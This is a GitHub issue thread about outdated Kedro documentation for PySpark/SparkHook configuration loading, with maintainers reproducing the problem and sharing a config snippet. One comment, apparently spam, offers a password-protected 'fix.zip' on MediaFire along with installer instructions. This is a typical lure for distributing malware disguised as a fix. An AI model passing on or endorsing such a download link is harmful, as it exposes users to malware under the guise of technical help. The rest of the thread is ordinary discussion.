### ISSUE TITLE
Documentation for SparkHook needs updating to v19

### ISSUE THREAD

**Issue by alexisdrakopoulos** [kedro-org/kedro#4118]
## Description

The stable doc here: https://docs.kedro.org/en/stable/integrations/pyspark_integration.html is out of date I think.

Specifically:
`parameters = context.config_loader.get("spark*", "spark*/**")`

needs to be update to the new method.

I am mentioning this as I tried `config_loader["spark"]` with:
```yaml
CONFIG_LOADER_ARGS = {
    "config_patterns": {
        "spark": ["spark*", "spark*/**"],
    },
}
```
but it couldn't find the `conf/base/spark.yml `for some reason, so I moved it to `conf/databricks/spark.yml` and now it finds it.

### Documentation page (if applicable)

https://docs.kedro.org/en/stable/integrations/pyspark_integration.html

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ElenaKhaustova** [comment]
Thank you, @alexisdrakopoulos, for reporting an issue!

I tried to reproduce an issue, and I created `conf/base/spark.yml` and set 
```
CONFIG_LOADER_ARGS = {
      "base_env": "base",
      "default_run_env": "local",
      "config_patterns": {
          "spark": ["spark*/"],
       }
}
```

and it seems to be working well; at least it can find `conf/base/spark.yml`
![Screenshot 2024-08-27 at 12 05 25](https://github.com/user-attachments/assets/e6d87200-8343-4ccf-866c-16c77364d9bc)

So, for me, it looks like this line in the docs might not be relevant: `parameters = context.config_loader.get("spark*", "spark*/**")`

We will double-check and come back.

**Comment by merelcht** [comment]
I'm bumping the priority on this, because it's been reported again in https://github.com/kedro-org/kedro/issues/4166
